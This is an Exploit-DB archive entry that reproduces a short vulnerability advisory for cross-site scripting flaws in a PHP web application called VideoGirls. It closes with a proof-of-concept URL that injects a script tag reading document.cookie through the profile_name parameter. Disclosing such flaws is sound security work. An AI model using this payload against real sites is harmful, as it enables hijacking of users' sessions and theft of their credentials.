exploit-db-mirror/platforms/php/webapps/33187.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

7 lines
No EOL
504 B
Text
Executable file

source: http://www.securityfocus.com/bid/36168/info
VideoGirls is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
http://www.example.com/profile.php?profile_name="><script>alert(document.cookie);</script>